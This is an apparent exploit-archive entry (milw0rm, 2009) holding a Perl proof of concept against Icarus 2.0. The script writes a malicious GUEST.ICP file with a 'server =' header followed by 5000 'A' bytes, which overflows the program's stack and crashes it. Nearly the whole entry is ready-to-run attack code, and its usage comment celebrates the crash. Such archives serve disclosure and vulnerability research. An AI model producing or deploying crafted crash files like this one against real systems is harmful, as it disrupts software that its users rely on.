Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)
Author: ThE g0bL!N
type: dos
platform: windows
port:
date_added: 2009-07-13
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
#!/usr/bin/perl
#Icarus 2.0(GUEST.ICP) Local Stack Overflow PoC
#By ThE g0bL!N
#usage: After Clicking On Perl File Run The Program And Choose Continue Booom The Program Crashed :)
################################################################
$Header="\x73\x65\x72\x76\x65\x72\x20\x3D" ;
$junk="\x41" x 5000 ;
###################################################################
open(myfile,'>>GUEST.ICP');
print myfile $Header.$junk;
###################################################################
# milw0rm.com [2009-07-14]